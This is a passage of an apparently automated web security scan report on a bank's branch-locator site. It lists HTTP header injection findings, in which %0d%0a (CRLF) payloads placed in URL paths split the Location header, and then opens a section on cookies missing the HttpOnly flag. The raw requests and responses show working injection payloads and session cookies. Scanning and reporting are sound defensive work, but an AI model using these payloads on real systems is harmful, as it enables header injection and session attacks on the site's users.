The value of REST URL parameter 4 is copied into the Location response header. The payload dff02%0d%0a3c4ae36e361 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/dff02%0d%0a3c4ae36e361 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:32:42 GMT
Server: Apache
Set-Cookie: JSESSIONID=07D737FB0B2F2B11601ADAD3252F239B.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/dff02
3c4ae36e361?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.207. http://locators.bankofamerica.com/locator/locator/scripts/functions.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/functions.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d4bb8%0d%0a76c6fba121d was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/d4bb8%0d%0a76c6fba121d HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=4504EA6F3D5130495B841DCC6A6F2E4C.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/d4bb8
76c6fba121d?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.208. http://locators.bankofamerica.com/locator/locator/scripts/i2a.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/i2a.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 39521%0d%0a8358b5c51e3 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/39521%0d%0a8358b5c51e3 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=D1AF2F7C4BFD62787A523ACA820BFA17.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/39521
8358b5c51e3?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.209. http://locators.bankofamerica.com/locator/locator/scripts/idle-timer.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/idle-timer.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8ad81%0d%0a94205f346dc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/8ad81%0d%0a94205f346dc HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:43 GMT
Server: Apache
Set-Cookie: JSESSIONID=7D474C8127D3009EA27F4C4F315F1B78.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/8ad81
94205f346dc?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.210. http://locators.bankofamerica.com/locator/locator/scripts/jquery-1.3.2.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f8581%0d%0a8d7f0521e16 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/f8581%0d%0a8d7f0521e16 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FCD7363643DB9D12D507D043B5F3CED5.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'ATM-31691'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; NSC_CbolPgBnfsjdb=445b32097852; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31; cmRS=&t1=1309296062784&t2=1309296068080&t3=1309297341350&fti=1309297341350&fn=HelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A0%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A1%3BHelpOnlineReferralolbnav_loc_dotcomLocationsFind_ATMs_and_Banking_Centers%28DOTCOM%29_UNDEFINED%3A2%3B&ac=-1:U&fd=1%3A0%3AfullAddress%3B&uer=&fu=&pi=Help%3AOnlineReferral%3Aolbnav_loc_dotcom%3BLocations%3AFind_ATMs_and_Banking_Centers%28DOTCOM%29&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//locators.bankofamerica.com/locator/locator/LocatorAction.do&rf=http%3A//learn.bankofamerica.com/articles/managing-credit/understanding-your-credit-card.html

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=8877E3DF0EA0EE7F96926245C6E3B03B.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/f8581
8d7f0521e16?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.211. http://locators.bankofamerica.com/locator/locator/scripts/jquery-1.4.1.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/jquery-1.4.1.min.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload db1df%0d%0ae2a6bc769f1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/db1df%0d%0ae2a6bc769f1 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=8FFC3B9BF4E6C1AF06B0A7CDB3B5B861.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/db1df
e2a6bc769f1?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.212. http://locators.bankofamerica.com/locator/locator/scripts/jquery.cookies.2.2.0.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/jquery.cookies.2.2.0.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4a2d0%0d%0a55b6f51361e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/4a2d0%0d%0a55b6f51361e HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:43 GMT
Server: Apache
Set-Cookie: JSESSIONID=8F5B61FD3B5594543735383B5D1D4506.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/4a2d0
55b6f51361e?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.213. http://locators.bankofamerica.com/locator/locator/scripts/jquery.idletimeout.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/jquery.idletimeout.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 41117%0d%0a42ea56fd20 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/41117%0d%0a42ea56fd20 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=4CE87153B680E0615A9C498F5B5F0B9D.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/41117
42ea56fd20?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.214. http://locators.bankofamerica.com/locator/locator/scripts/json2.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/json2.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload a0b57%0d%0a8ef7ff99d08 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/a0b57%0d%0a8ef7ff99d08 HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=914EA97ACC731282B0BF06FC58863D1F.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/a0b57
8ef7ff99d08?shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

1.215. http://locators.bankofamerica.com/locator/locator/scripts/ligeo.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/scripts/ligeo.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload af29f%0d%0a88fab7dd4c0 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/scripts/af29f%0d%0a88fab7dd4c0?LOC=en_US HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=5525D9B17161EE163E0CBD6F2F6DEDF1.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/scripts/af29f
88fab7dd4c0?LOC=en_US&shouldTest=true
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/plain

2. Cookie without HttpOnly flag set  previous  next
There are 76 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

2.1. http://locators.bankofamerica.com/locator/atmbranch/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/atmbranch/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /locator/atmbranch/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 29 Jun 2011 12:20:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=5BD855E0DA8F0A0DC6AFB168FE02F2BB.ftb-web1; Path=/locator/atmbranch
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Pragma: no-cache
cache-control: no-store
Location: http://locators.bankofamerica.com/locator/atmbranch/ListLoadAction.do
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain;charset=ISO-8859-1

2.2. http://locators.bankofamerica.com/locator/gen3loc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/gen3loc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/gen3loc/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=9D0B29DE2028E576F47F0089CAAE3B52.ftb-web1; Path=/locator/gen3loc
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/gen3loc
Location: http://locators.bankofamerica.com/locator/gen3loc/jsp/index.jsp?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.3. http://locators.bankofamerica.com/locator/locator/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/ HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FCD7363643DB9D12D507D043B5F3CED5.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; 